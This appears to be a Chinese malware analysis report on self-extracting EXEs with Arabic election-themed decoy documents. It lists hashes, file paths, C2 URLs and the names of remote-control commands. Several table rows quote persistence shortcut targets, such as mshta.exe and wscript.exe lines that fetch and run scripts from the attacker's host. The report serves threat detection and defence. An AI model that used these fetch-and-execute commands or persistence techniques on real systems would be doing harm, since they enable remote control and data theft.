图:诱饵文档1
图:诱饵文档2
图:攻击流程
文件名 | اجتماع لجنة الانتخابات – إقليم الشمال .exe |
中文翻译 | 选举委员会会议-北领地.exe |
MD5 | 6E62856152EB198B457487E1EED94D76 |
文件大小 | 396.71KB(406234 bytes) |
文件格式 | Win32 EXE |
创建时间 | 2019-4-27 |
VT首次上传时间 | 2019-11-05 |
VT检测结果 | 37 / 70 |
涉及URL | http://192.119.111.4/xx/dv |
内含诱饵文档名 | GSHword.docx |
表:自解压文件1信息
图:自解压文件1
文件名 | المجدلاني يشكك بجدية الرئيس عباس بشأن الانتخابات الرئاسية.exe |
中文翻译 | Majdalani严重怀疑阿巴斯总统关于总统选举.exe |
MD5 | 4FA306739FD3ECC75B0EE202A614061D |
文件大小 | 389.28KB (398627bytes) |
文件格式 | Win32 EXE |
创建时间 | 2019-4-27 |
VT首次上传时间 | 2019-11-07 |
VT检测结果 | 27 / 70 |
涉及URL | http://192.119.111.4/xx/dv |
内含诱饵文档名 | wordwatan.docx |
表:自解压文件2信息
图:自解压文件2
图:自解压命令
文件名 | GSHword.docx |
MD5 | D99F2923C81E703C6345D30BF0E15CD9 |
所处目录 | %temp% |
VT检测结果 | 0 / 59 |
表:诱饵文档1:GSHword.docx的信息
文件名 | wordwatan.docx |
MD5 | 7E55C6E273FE45336299A7AAA46D5A2B |
所处目录 | %temp% |
VT检测结果 | 0 / 62 |
表:诱饵文档2:wordwatan.docx的信息
文件名 | HelPPane.lnk |
MD5 | F4355A61D7AC60D3282A9A207A643589 |
目标属性 | C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv |
所处目录 | %appdata% \Microsoft\Windows\Start Menu\Programs\Startup |
VT检测结果 | 样本无上报 |
表:HelPPane.lnk 信息
图:HelPPane.lnk的目标属性
来源 | http://192.119.111.4/xx/dv |
MD5 | 7BCBE8CC5A05DF9FCEA4E7E52BD00D79 |
执行方式 | C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv |
涉及URL | http://192.119.111.4/xx/dv.zip |
表:dv.vbs 信息
图:dv.vbs脚本文件
文件名 | xxxx.tmp(xxxx表示随机命名) |
MD5 | 9094DF33AA0D6B1DD4EFAF34E91A05C4 |
所处目录 | %temp% |
来源 | http://192.119.111.4/xx/dv.zip |
涉及URL | http://192.119.111.4/xx/f_Skoifa.vbs |
表:dv.zip.vbs 信息
文件名 | f_Skoifa.vbs |
MD5 | FD5BA76F85C9746F7A326B954874F5A6 |
所处目录 | %USERPROFILE%\AppData\Local |
来源 | http://192.119.111.4/xx/f_Skoifa.vbs |
表:f_Skoifa.vbs 信息
图:下载f_Skoifa.vbs
文件名 | Help |
所处目录 | %USERPROFILE%\AppData\Roaming\Microsoft\Windows |
子文件 | HelpPane.lnk |
表:Help 信息
图:创建Help文件夹
图:更改注册表
文件名 | HelpPane.lnk |
MD5 | 2818ECDE79CEDC1E181D7B69F14840A6 |
目标属性 | C:\Windows\System32\wscript.exe %USERPROFILE%\AppData\Local\f_Skoifa.vbs |
所处目录 | %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help |
VT检测结果 | 样本无上报 |
表:HelpPane.lnk 信息
图:创建快捷方式文件
图:更改文件属性
文件名 | f_Skoifa.vbs |
MD5 | FD5BA76F85C9746F7A326B954874F5A6 |
所处目录 | %USERPROFILE%\AppData\Local |
来源 | http://192.119.111.4/xx/f_Skoifa.vbs |
涉及URL | http://192.119.111.4:4587/is-ready http:// 192.119.111.4:4587 / is-enum-driver http:// 192.119.111.4:4587 / is-sending http:// 192.119.111.4:4587 / is-enum-faf http:// 192.119.111.4:4587 / is-enum-process |
表:_Skoifa.vbs 信息
图:f_Skoifa.vbs密文
图:f_Skoifa.vbs明文
图:发送信息和接收远控指令
图:远控指令
图:远控指令名excecute
图:远控指令名send
图:远控指令名send对应的操作函数
图:远控指令名recv
图:远控指令名enum-driver
图:远控指令名enum-driver对应的操作函数
图:远控指令名enum-faf
图:远控命令enum-faf对应的操作函数
图:远控指令名enum-process
图:远控指令名enum-process对应的函数操作
图:远控指令名delete
图:远控指令名exit-process
图:远控指令名exit-process对应的操作函数